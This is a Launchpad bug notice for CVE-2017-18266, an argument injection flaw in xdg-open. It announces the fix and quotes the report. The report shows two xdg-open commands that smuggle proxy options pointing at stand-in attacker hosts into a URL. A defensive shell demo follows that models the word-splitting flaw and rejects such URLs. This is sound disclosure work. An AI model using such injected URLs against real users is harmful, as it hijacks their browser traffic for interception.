This was addressed in https://usn.ubuntu.com/usn/usn-3650-1 and in
xdg-utils 1.1.2-1ubuntu3 for cosmic. Thanks for the report!

** Changed in: xdg-utils (Ubuntu)
       Status: New => Fix Released

https://bugs.launchpad.net/bugs/1772295

Title:
  CVE-2017-18266: argument injection in xdg-open

Status in Xdg-utils:
  Fix Released
Status in xdg-utils package in Ubuntu:
  Fix Released

Bug description:
  An attacker can silently set their proxy in browser settings to
  capture user's traffic, using a malformed URL in xdg-open.

  The following command tries to open the Yandex main page through a
  third-party proxy server.

      env -i BROWSER="links %s" xdg-open 'http://www.yandex.com/ -http-proxy evil-site.example.org:8080'

  Another sample exploit, this time with the Chromium browser.

      env -i BROWSER="chromium %s" xdg-open "http://www.example.com/ --proxy-pac-url=http://dangerous.example.net/proxy.pac"
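
  Both commands rely on the same mechanism: the URL is substituted for %s
  in the BROWSER template and the result is expanded unquoted, so the shell
  splits at the space and hands the attacker-chosen words to the browser as
  extra options. The following is an added example, not xdg-utils code: it
  reproduces that split with a stand-in browser that only counts its
  arguments, and shows a launcher that refuses any URL which would expand to
  more than one shell word (a valid URL never contains a literal space).
  fake_browser, launch_unquoted, has_single_argument and launch_checked are
  names invented for this example; the template is assumed to hold one %s.

```shell
#!/bin/sh
# Added example (not xdg-utils code): models the %s substitution behind
# BROWSER="links %s" with a stand-in browser that only reports how many
# arguments it received. Nothing is opened and no network is used.

# Stand-in for the program named in BROWSER: prints its argument count.
fake_browser() {
    echo "$#"
}

# Vulnerable pattern: %s is filled in, then the whole string is expanded
# unquoted. The shell splits on spaces, so a URL with a space followed by
# an option name arrives at the browser as several separate arguments.
launch_unquoted() {
    browser_argv=$(printf "$1" "$2")   # $1 = template with %s, $2 = URL
    $browser_argv                       # word splitting happens here
}

# Guard: RFC 3986 URLs percent-encode spaces, so after word splitting a
# genuine URL is always exactly one word.
has_single_argument() {
    test "$#" -eq 1
}

# Hardened launcher: reject anything that would split into extra
# arguments before the template is expanded at all.
launch_checked() {
    template=$1
    url=$2
    # $url is deliberately unquoted so the check sees the same split the
    # unquoted expansion below would produce.
    if ! has_single_argument $url; then
        echo "refused: URL expands to more than one argument" >&2
        return 1
    fi
    browser_argv=$(printf "$template" "$url")
    $browser_argv
}

# Constructed inputs: the two payloads from the report and a benign URL.
PROXY_URL='http://www.yandex.com/ -http-proxy evil-site.example.org:8080'
PAC_URL='http://www.example.com/ --proxy-pac-url=http://dangerous.example.net/proxy.pac'
SAFE_URL='http://www.example.com/'

# Stand-alone run: compare what each launcher does with every input.
for u in "$SAFE_URL" "$PROXY_URL" "$PAC_URL"; do
    echo "unquoted launcher: browser received $(launch_unquoted 'fake_browser %s' "$u") argument(s)"
    if launch_checked 'fake_browser %s' "$u" >/dev/null 2>&1; then echo "checked launcher:  accepted"; else echo "checked launcher:  refused"; fi
done
```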

-- 
Mailing list: https://launchpad.net/~desktop-packages